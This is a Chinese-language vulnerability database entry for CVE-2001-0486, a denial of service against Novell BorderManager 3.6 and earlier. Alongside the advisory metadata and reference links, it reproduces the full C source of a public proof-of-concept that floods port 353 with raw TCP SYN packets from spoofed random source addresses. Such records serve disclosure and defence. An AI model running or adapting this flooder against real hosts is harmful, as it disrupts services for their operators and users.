CVE-2001-0486
CVSS5.0
发布时间 :2001-07-02 00:00:00
修订时间 :2016-10-17 22:11:21
NMCOE    

[原文]Remote attackers can cause a denial of service in Novell BorderManager 3.6 and earlier by sending TCP SYN flood to port 353.


[CNNVD]Novell BorderManager漏洞(CNNVD-200107-013)

        Novell BorderManager 3.6及其早期版本存在漏洞。远程攻击者通过发送TCP SYN flood到353端口导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0486
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0486
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-013
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-05/0000.html
(PATCH)  BUGTRAQ  20010501 Re: Proof of concept DoS against novell border manager enterprise edition 3.5
http://archives.neohapsis.com/archives/vuln-dev/2001-q2/0020.html
(VENDOR_ADVISORY)  VULN-DEV  20010402 (no subject)
http://marc.info/?l=bugtraq&m=98779821207867&w=2
(UNKNOWN)  BUGTRAQ  20010420 Novell BorderManager 3.5 VPN Denial of Service
http://marc.info/?l=bugtraq&m=98865027328391&w=2
(UNKNOWN)  BUGTRAQ  20010429 Proof of concept DoS against novell border manager enterprise
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2959062.htm
(VENDOR_ADVISORY)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2959062.htm
http://www.securityfocus.com/bid/2623
(VENDOR_ADVISORY)  BID  2623
http://xforce.iss.net/static/6429.php
(UNKNOWN)  XF  bordermanager-vpn-syn-dos(6429)

- 漏洞信息

Novell BorderManager漏洞
中危 未知
2001-07-02 00:00:00 2005-05-02 00:00:00
远程  
        Novell BorderManager 3.6及其早期版本存在漏洞。远程攻击者通过发送TCP SYN flood到353端口导致服务拒绝。

- 公告与补丁

        

- 漏洞信息 (264)

Novell BorderManager Enterprise Edition 3.5 Denial of Service Exploit (EDBID:264)
novell dos
2001-05-07 Verified
0 honoriak
N/A [点击下载]
/* 29.4.2001 honoriak@mail.ru
   Proof of concept DoS Novell BorderManager Enterprise Edition 3.5
   helisec
   DoSs are lame, i know, but boredom is ugly. DON'T ABUSE.
   greets: jimjones, doing, darkcode for his paper about raw sockets 
   and all helisec guys.
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <time.h>  
#include <sys/types.h>
#include <sys/stat.h> 
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>

#define __FAVOR_BSD
#include <netinet/tcp.h>

#define PORT 353 

 /* to be easier the processing, this struct :) */
 
 struct pseudohdr {
         struct in_addr saddr;
         struct in_addr daddr;
         u_char zero;
         u_char protocol;
         u_short len;
         struct tcphdr tcpheader;
     }pseudoh;
                                    

unsigned long resolve(name)  
	char *name;
 {

struct in_addr h2;
struct hostent *hname;

if (!(hname = gethostbyname(name))) return(0);
memcpy((char *)&h2.s_addr, hname->h_addr, hname->h_length);
return(h2.s_addr);
}
               
 /* checksum ripped and modified by me */
 
u_short
checksum (data, length)
	u_short *data;
	u_short length;
{

register long value;
u_short i;
    
      for (i = 0; i < (length >> 1); i++)
       value += data[i];
          
       if ((length & 1) == 1)
       value += (data[i] << 8);
                
       value = (value & 65535) + (value >> 16);
                  
       return (~value);
}
                    

void packet(vic, socket) 
	struct sockaddr_in *vic;
	int socket;
 {
 
 int count;
 char buf[40];
                     
 struct ip *ipheader = (struct ip *)buf;
 struct tcphdr *tcpheader = (struct tcphdr *)(buf + sizeof(struct ip));
 
 bzero (&buf, (sizeof(struct ip) + sizeof(struct tcphdr)) );
 
 	/* filling ip struct */
 	
 	ipheader->ip_v = IPVERSION;
 	ipheader->ip_hl = 5;
 	ipheader->ip_tos = htons(0);
 	ipheader->ip_len = htons(sizeof(buf));
 	ipheader->ip_id = rand() % 0xffff;
 	ipheader->ip_off = htons(0);
 	ipheader->ip_ttl = 0xff;  /* 255 hex */
 	ipheader->ip_p = IPPROTO_TCP;
 	ipheader->ip_src.s_addr = rand();
 	ipheader->ip_dst.s_addr = vic->sin_addr.s_addr;
 	ipheader->ip_sum = 0;
 	
 	/* filling tcphdr struct */
 	
 	tcpheader->th_sport = 2424; /* random */
 	tcpheader->th_dport = vic->sin_port;
 	tcpheader->th_seq = htonl(0xF1C); /* random */
 	tcpheader->th_ack = 0;
 	tcpheader->th_off = 5;
 	tcpheader->th_flags = TH_SYN; /* the important flag */
 	tcpheader->th_win = 4096;
 	tcpheader->th_sum = 0;   
 	

 bzero (&pseudoh, 12 + sizeof(struct tcphdr));
 pseudoh.saddr.s_addr = rand();
 pseudoh.daddr.s_addr = vic->sin_addr.s_addr;
 pseudoh.protocol = 6;
 pseudoh.len = htons (sizeof(struct tcphdr));
 memcpy((char *)&pseudoh.tcpheader, (char *)tcpheader, sizeof (struct tcphdr));
 tcpheader->th_sum = checksum((u_short *)&pseudoh, 12 + sizeof (struct tcphdr));
  
 /* sending packets, DON'T ABUSE! */

for (count = 0; count < 260; count++) {
  if ( (sendto(socket, 
 	   buf, 
 	   (sizeof(struct iphdr) + sizeof(struct tcphdr)), 
 	   0, 
 	   (struct sockaddr *)vic, 
 	   sizeof(struct sockaddr_in))) < 0) {
 	   fprintf(stderr, "Error sending packets\n"); 
           exit(-1);
           }              
      }                              	                                                    
close (socket);
  }
 
void usage(proggy) 
	char *proggy;
 {
	fprintf(stderr,"DoS a Novell BorderManager Enterprise Edition 3.5\n");
	fprintf(stderr, "honoriak@mail.ru from helisec\n");
	fprintf(stderr, "Usage: %s host\n", proggy);
	exit(0);
	}

main(argc, argv) 
	int argc;
	char *argv[];
	
 {
  
  struct sockaddr_in h;
  int s0ck, uno = 1;
  
  if (argc < 2)
  	{
  	usage(argv[0]);
  	}
  	
  bzero(&h, sizeof(h)); 
  h.sin_family = AF_INET;   
  h.sin_port = htons(PORT); 

if ( (inet_pton(AF_INET, argv[1], &h.sin_addr)) <= 0)
	{
	h.sin_addr.s_addr = resolve(argv[1]);
	}
	
if (!h.sin_addr.s_addr) {
	fprintf(stderr, "Error resolving host\n");
	exit(-1);
	}
	
if ((s0ck = socket(AF_INET, SOCK_RAW, 255)) < 0) {
        fprintf(stderr, "Error creating raw socket, root is needed\n");
        exit (-1);
        }

setsockopt(s0ck, SOL_SOCKET, SO_BROADCAST, &uno, sizeof(uno));

packet(&h, s0ck);
fprintf(stderr, "DoS completed.\n");
exit(0);
}


// milw0rm.com [2001-05-07]
		

- 漏洞信息

1795
Novell BorderManager Port 353 SYN DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-04-20 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站